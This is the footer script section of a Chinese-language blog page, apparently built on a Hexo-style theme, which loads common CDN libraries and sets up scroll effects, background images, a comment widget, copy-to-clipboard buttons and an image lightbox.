<script src="//instant.page/1.2.2" type="module" integrity="sha384-2xV8M5griQmzyiY3CDqh1dn4z3llDVqZDqzjzcY+jCBCk/a5fXJmuZ/40JJAPeoU"></script>


  <script async src="https://cdn.jsdelivr.net/npm/scrollreveal@4.0.5/dist/scrollreveal.min.js"></script>
  <script type="text/javascript">
    $(function() {
      const $reveal = $('.reveal');
      if ($reveal.length === 0) return;
      const sr = ScrollReveal({ distance: 0 });
      sr.reveal('.reveal');
    });
  </script>


  <script src="https://cdn.jsdelivr.net/npm/node-waves@0.7.6/dist/waves.min.js"></script>
  <script type="text/javascript">
    $(function() {
      Waves.attach('.flat-btn', ['waves-button']);
      Waves.attach('.float-btn', ['waves-button', 'waves-float']);
      Waves.attach('.float-btn-light', ['waves-button', 'waves-float', 'waves-light']);
      Waves.attach('.flat-box', ['waves-block']);
      Waves.attach('.float-box', ['waves-block', 'waves-float']);
      Waves.attach('.waves-image');
      Waves.init();
    });
  </script>



  <!-- fastclick -->
  <script src="https://cdn.jsdelivr.net/npm/fastclick@1.0.6/lib/fastclick.min.js"></script>
  <script>
    document.addEventListener('DOMContentLoaded', function() {
      FastClick.attach(document.body)
    }, false)
  </script>



  
  
  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-backstretch/2.0.4/jquery.backstretch.min.js"></script>
    <script type="text/javascript">
      $(function(){
        if ('.cover') {
          $('.cover').backstretch(
          ["https://github.com/tkcharlotte/notarget/blob/master/bg.jpg"],
          {
            duration: "6000",
            fade: "2500"
          });
        } else {
          $.backstretch(
          ["https://github.com/tkcharlotte/notarget/blob/master/bg.jpg"],
          {
            duration: "6000",
            fade: "2500"
          });
        }
      });
    </script>
  






  <script type="text/javascript">
    (function(d, s) {
      var j, e = d.getElementsByTagName(s)[0];
      if (typeof LivereTower === 'function') { return; }
      j = d.createElement(s);
      j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
      j.async = true;
      e.parentNode.insertBefore(j, e);
    })(document, 'script');
  </script>






  <script src="/js/app.js"></script>


  <script src="/js/search.js"></script>




<!-- 复制 -->
<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  let COPY_SUCCESS = "复制成功";
  let COPY_FAILURE = "复制失败";
  /*页面载入完成后，创建复制按钮*/
  !function (e, t, a) {
    /* code */
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '  <i class="fa fa-copy"></i><span>复制</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });

      clipboard.on('success', function(e) {
        //您可以加入成功提示
        console.info('Action:', e.action);
        console.info('Text:', e.text);
        console.info('Trigger:', e.trigger);
        success_prompt(COPY_SUCCESS);
        e.clearSelection();
      });
      clipboard.on('error', function(e) {
        //您可以加入失败提示
        console.error('Action:', e.action);
        console.error('Trigger:', e.trigger);
        fail_prompt(COPY_FAILURE);
      });
    }
    initCopyCode();

  }(window, document);

  /**
   * 弹出式提示框，默认1.5秒自动消失
   * @param message 提示信息
   * @param style 提示样式，有alert-success、alert-danger、alert-warning、alert-info
   * @param time 消失时间
   */
  var prompt = function (message, style, time)
  {
      style = (style === undefined) ? 'alert-success' : style;
      time = (time === undefined) ? 1500 : time*1000;
      $('<div>')
          .appendTo('body')
          .addClass('alert ' + style)
          .html(message)
          .show()
          .delay(time)
          .fadeOut();
  };

  // 成功提示
  var success_prompt = function(message, time)
  {
      prompt(message, 'alert-success', time);
  };

  // 失败提示
  var fail_prompt = function(message, time)
  {
      prompt(message, 'alert-danger', time);
  };

  // 提醒
  var warning_prompt = function(message, time)
  {
      prompt(message, 'alert-warning', time);
  };

  // 信息提示
  var info_prompt = function(message, time)
  {
      prompt(message, 'alert-info', time);
  };

</script>


<!-- fancybox -->
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
<script>
  let LAZY_LOAD_IMAGE = "";
  $(".article-entry").find("fancybox").find("img").each(function () {
      var element = document.createElement("a");
      $(element).attr("data-fancybox", "gallery");
      $(element).attr("href", $(this).attr("src"));
      /* 图片采用懒加载处理时,
       * 一般图片标签内会有个属性名来存放图片的真实地址，比如 data-original,
       * 那么此处将原本的属性名src替换为对应属性名data-original,
       * 修改如下
       */
       if (LAZY_LOAD_IMAGE) {
         $(element).attr("href", $(this).attr("data-original"));
       }
      $(this).wrap(element);
  });
</script>





  <script>setLoadingBarProgress(100);</script>
</body>
</html>
